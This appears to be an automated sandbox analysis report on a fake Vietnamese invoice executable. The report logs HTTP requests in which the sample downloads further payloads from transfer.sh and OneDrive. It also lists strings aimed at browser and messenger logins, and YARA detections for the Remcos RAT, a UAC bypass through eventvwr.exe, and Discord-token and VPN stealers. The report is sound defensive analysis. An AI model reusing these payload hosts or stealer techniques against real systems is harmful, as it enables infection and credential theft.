              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: aspnet_compiler.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW,14_2_0041183A
              Source: Shhejayly.exe, 00000012.00000002.524974268.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: aspnet_compiler.exeProcess created: 50

              System Summary

              barindex
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
              Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
              Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
              Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_00B4C1140_2_00B4C114
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_00B4E5580_2_00B4E558
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_00B4E5480_2_00B4E548
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E5FB00_2_077E5FB0
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077EB6200_2_077EB620
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E90840_2_077E9084
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E5FA00_2_077E5FA0
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077EB60F0_2_077EB60F
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077EB5C30_2_077EB5C3
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E63CF0_2_077E63CF
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077EA2440_2_077EA244
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E50680_2_077E5068
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E50590_2_077E5059
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E00400_2_077E0040
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_077E003E0_2_077E003E
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeCode function: 0_2_078C83A00_2_078C83A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_1001719412_2_10017194
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044B04014_2_0044B040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0043610D14_2_0043610D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044731014_2_00447310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044A49014_2_0044A490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0040755A14_2_0040755A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0043C56014_2_0043C560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044B61014_2_0044B610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044D6C014_2_0044D6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004476F014_2_004476F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044B87014_2_0044B870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044081D14_2_0044081D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0041495714_2_00414957
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_004079EE14_2_004079EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00407AEB14_2_00407AEB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044AA8014_2_0044AA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00412AA914_2_00412AA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00404B7414_2_00404B74
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00404B0314_2_00404B03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0044BBD814_2_0044BBD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00404BE514_2_00404BE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00404C7614_2_00404C76
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00415CFE14_2_00415CFE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00416D7214_2_00416D72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00446D3014_2_00446D30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00446D8B14_2_00446D8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_00406E8F14_2_00406E8F
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
              Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
